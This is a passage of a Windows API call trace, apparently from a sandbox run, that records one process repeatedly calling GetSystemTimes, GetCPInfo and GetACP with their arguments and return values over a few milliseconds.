lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.271] GetACP () returned 0x4e4 [0111.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.271] GetACP () returned 0x4e4 [0111.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.271] GetACP () returned 0x4e4 [0111.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.271] GetACP () returned 0x4e4 [0111.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.271] GetACP () returned 0x4e4 [0111.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.272] GetACP () returned 0x4e4 [0111.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.272] GetACP () returned 0x4e4 [0111.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.272] GetACP () returned 0x4e4 [0111.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.272] GetACP () returned 0x4e4 [0111.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.272] GetACP () returned 0x4e4 [0111.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.272] GetACP () returned 0x4e4 [0111.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.272] GetACP () returned 0x4e4 [0111.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.273] GetACP () returned 0x4e4 [0111.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.273] GetACP () returned 0x4e4 [0111.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.273] GetACP () returned 0x4e4 [0111.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.273] GetACP () returned 0x4e4 [0111.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.273] GetACP () returned 0x4e4 [0111.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.273] GetACP () returned 0x4e4 [0111.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.273] GetACP () returned 0x4e4 [0111.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.273] GetACP () returned 0x4e4 [0111.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.274] GetACP () returned 0x4e4 [0111.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.274] GetACP () returned 0x4e4 [0111.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.274] GetACP () returned 0x4e4 [0111.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.274] GetACP () returned 0x4e4 [0111.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.274] GetACP () returned 0x4e4 [0111.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.274] GetACP () returned 0x4e4 [0111.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.274] GetACP () returned 0x4e4 [0111.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.274] GetACP () returned 0x4e4 [0111.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.275] GetACP () returned 0x4e4 [0111.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.275] GetACP () returned 0x4e4 [0111.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.275] GetACP () returned 0x4e4 [0111.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.275] GetACP () returned 0x4e4 [0111.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.275] GetACP () returned 0x4e4 [0111.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.275] GetACP () returned 0x4e4 [0111.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.275] GetACP () returned 0x4e4 [0111.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.276] GetACP () returned 0x4e4 [0111.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.276] GetACP () returned 0x4e4 [0111.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.276] GetACP () returned 0x4e4 [0111.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.276] GetACP () returned 0x4e4 [0111.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.276] GetACP () returned 0x4e4 [0111.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.276] GetACP () returned 0x4e4 [0111.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.276] GetACP () returned 0x4e4 [0111.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.276] GetACP () returned 0x4e4 [0111.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.277] GetACP () returned 0x4e4 [0111.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.277] GetACP () returned 0x4e4 [0111.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.277] GetACP () returned 0x4e4 [0111.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.277] GetACP () returned 0x4e4 [0111.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.277] GetACP () returned 0x4e4 [0111.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.277] GetACP () returned 0x4e4 [0111.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.277] GetACP () returned 0x4e4 [0111.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.278] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.278] GetACP () returned 0x4e4 [0111.278] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.278] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.278] GetACP () returned 0x4e4 [0111.278] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.278] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.278] GetACP () returned 0x4e4 [0111.278] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.278] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.278] GetACP () returned 0x4e4 [0111.278] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.278] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.278] GetACP () returned 0x4e4 [0111.278] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.278] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.278] GetACP () returned 0x4e4 [0111.278] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.278] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.278] GetACP () returned 0x4e4 [0111.278] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.279] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.279] GetACP () returned 0x4e4 [0111.279] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.279] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.279] GetACP () returned 0x4e4 [0111.279] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.279] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.279] GetACP () returned 0x4e4 [0111.279] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.279] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.279] GetACP () returned 0x4e4 [0111.279] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.279] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.279] GetACP () returned 0x4e4 [0111.279] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.279] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.279] GetACP () returned 0x4e4 [0111.279] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.279] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.279] GetACP () returned 0x4e4 [0111.279] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.279] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.280] GetACP () returned 0x4e4 [0111.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.280] GetACP () returned 0x4e4 [0111.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.280] GetACP () returned 0x4e4 [0111.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.280] GetACP () returned 0x4e4 [0111.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.280] GetACP () returned 0x4e4 [0111.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.280] GetACP () returned 0x4e4 [0111.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.280] GetACP () returned 0x4e4 [0111.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.280] GetACP () returned 0x4e4 [0111.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.281] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.281] GetACP () returned 0x4e4 [0111.281] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.281] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.281] GetACP () returned 0x4e4 [0111.281] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.281] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.281] GetACP () returned 0x4e4 [0111.281] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.281] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.281] GetACP () returned 0x4e4 [0111.283] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.284] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.284] 